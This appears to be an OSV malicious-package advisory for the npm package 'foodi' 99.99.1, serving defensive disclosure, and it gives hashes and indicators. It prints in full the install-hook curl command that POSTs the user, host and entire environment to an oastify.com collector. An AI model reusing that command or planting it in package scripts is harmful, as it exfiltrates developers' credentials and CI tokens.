MAL-2026-12383

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/foodi/MAL-2026-12383.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-12383
Published
2026-08-05T12:30:33Z
Modified
2026-08-05T13:35:27.973022965Z
Summary
Malicious code in foodi (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (299310eb47eac6e7f39ee1a7346de8e524d9a91cc6a07d2e8879338fa86ff5af)

package.json declares preinstall and postinstall lifecycle scripts that both execute curl -X POST -k -s https://y0zhmssf65c8er7btoglvt9bg2mtakc81.oastify.com -d "u=$(whoami)&h=$(hostname)&e=$(env)". On npm install, the package runs whoami, hostname, and dumps the full process environment, then POSTs the collected data to a Burp Collaborator (oastify.com) subdomain over TLS with certificate verification disabled (-k). Environment variables on developer and CI machines routinely contain credentials, API keys, and CI tokens. The package's main module is empty, consistent with a squat/dependency-confusion payload whose sole function is install-time exfiltration.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-014684",
            "import_time": "2026-08-05T13:08:37.160373317Z",
            "sha256": "299310eb47eac6e7f39ee1a7346de8e524d9a91cc6a07d2e8879338fa86ff5af",
            "modified_time": "2026-08-05T12:30:33Z",
            "versions": [
                "99.99.1"
            ],
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / foodi

Package

Affected ranges

Affected versions

99.*
99.99.1

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-c+Ec3BD6Fafcbto4Q5ic6OXm87Afb136ZEbTsSU/9Pjt+r6dcU6g6//d73VO60OJRmN7ru7VjSzJt5FpIKrBWQ==",
                "sha1": "9a4cf9ffe907e042bd25177198750e43f6ea2e25"
            },
            "filename": "foodi-99.99.1.tgz"
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "0afddf10cceafc8097418d0206922863487caed73851db14579e7ac8ee4566e2",
            "tlsh": "fee0ab76f8209f737ac109ee380a8f4a7a833f1b11a81806d2d7084c57dc3b65a3b12d"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/foodi/MAL-2026-12383.json"